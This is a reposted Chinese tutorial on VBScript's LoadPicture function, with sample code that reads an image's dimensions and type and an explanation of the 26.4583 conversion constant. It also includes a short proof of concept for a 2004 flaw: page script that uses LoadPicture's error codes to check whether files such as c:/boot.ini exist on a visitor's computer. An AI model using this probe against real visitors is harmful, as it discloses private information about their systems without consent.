vbscript LoadPicture函數使用方法與漏洞利用

2019-10-26 18:02:01

字體：大中小

來源：轉載

供稿：網友

復制代碼代碼如下:

<title>LoadPicture函數</title>
<form name="frm">
選擇圖片<input type="file" name="pic" onChange="GetPicInfor()" >
</form>
<script language="vbscript">

Sub GetPicInfor()
dim objpic,iWidth,iHeight
dim pictype,picpath
picpath=document.frm.pic.value
set objpic=Loadpicture(picpath)
iWidth = round(objpic.width / 26.4583) '26.4583是像素值
iHeight = round(objpic.height / 26.4583)
select case objpic.type
case 0
pictype = "None"
case 1
pictype = "Bitmap"
case 2
pictype = "Metafile"
case 3
pictype = "Icon"
case 4
pictype = "Win32-enhanced metafile"
end select
document.write "你選擇了圖片"&picpath
document.write "<li>長度:"&iHeight&"</li>"
document.write "<li>寬度:"&iwidth&"</li>"
document.write "<li>類型:"&pictype&"</li>"
End Sub
</script>

不過這個函數有個漏洞，可以探測電腦上存在的文件名。2004年的漏洞，微軟現在也沒補，示例:

復制代碼代碼如下:

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:/boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
Sub loadIt(filename)
LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}
if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>

這段代碼中有一個“魔法數字（Magic Number）”26.4583，曾經有位昵稱是“亂碼”的朋友問過我這個26.4583是怎么來的，當時我也不知道。

前段時間逆向分析了一下vbscript.dll，才發現了其中的奧秘：
復制代碼代碼如下:

26.4583 = 2540 / 96

那你一定要問，這個2540和96又是怎么來的？

要弄清楚這個問題，首先要知道VBS的LoadPicture函數返回的到底是什么，VBS文檔是這么描述LoadPicture函數的：

Returns a picture object. Available only on 32-bit platforms.

只說返回圖片對象，卻沒說該圖片對象有什么屬性和方法。文檔語焉不詳，只好動用OllyDbg了：

LoadPicture函數內部調用了OleLoadPicture函數，查文檔可知返回的是IPictureDisp接口。不過后來我發現了更簡單的方法，那就是查VB的函數聲明（誰讓它們是一家人呢），在VB的對象瀏覽器中查找LoadPicture函數：

Function LoadPicture([FileName], [Size], [ColorDepth], [X], [Y]) As IPictureDisp雖然VBS的LoadPicture函數比VB的簡單，但是返回值應該是一樣的。

上一篇：PDF的VBS小程序代碼

下一篇：用vbs列出機器上所有能調用的組件